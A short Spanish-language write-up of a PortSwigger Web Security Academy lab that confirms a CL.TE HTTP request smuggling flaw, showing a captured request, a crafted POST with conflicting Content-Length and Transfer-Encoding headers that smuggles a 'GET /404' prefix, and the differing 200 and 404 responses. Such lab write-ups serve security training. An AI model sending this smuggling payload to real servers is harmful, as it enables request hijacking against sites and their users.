# Lab 1: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses

Luego de entrar al lab, se captura la siguiente peticion:

```
GET / HTTP/2
Host: 0a05007a0318f3d584e4316c00640007.web-security-academy.net
Cookie: session=KQQ8hjMfG3yRarWTcN8GZoMAq4fzBjMp
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Lo anterior responde con:

```
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 11466

```

Modificamos el request asi:

```
POST / HTTP/1.1
Host: 0a05007a0318f3d584e4316c00640007.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X
```

Y para que funcione debemos configurar lo siguiente en BURP:

<figure><img src="https://1990863415-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FCohdns2VDWfowigRKoD0%2Fuploads%2FuSBHAKxv9tx8kpRRuJH2%2Fimage.png?alt=media&#x26;token=9b07dad0-869e-4ad7-93bf-67c51596c35d" alt=""><figcaption></figcaption></figure>

La primera peticion responde con un codigo de respuesta de 200 pero la segunda peticion con un codigo 404:

<figure><img src="https://1990863415-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FCohdns2VDWfowigRKoD0%2Fuploads%2FHVNKlS8QEhpVfz8wwEx7%2Fimage.png?alt=media&#x26;token=44b3fca2-3a04-4dcb-b8d7-dd30f42eadb3" alt=""><figcaption></figcaption></figure>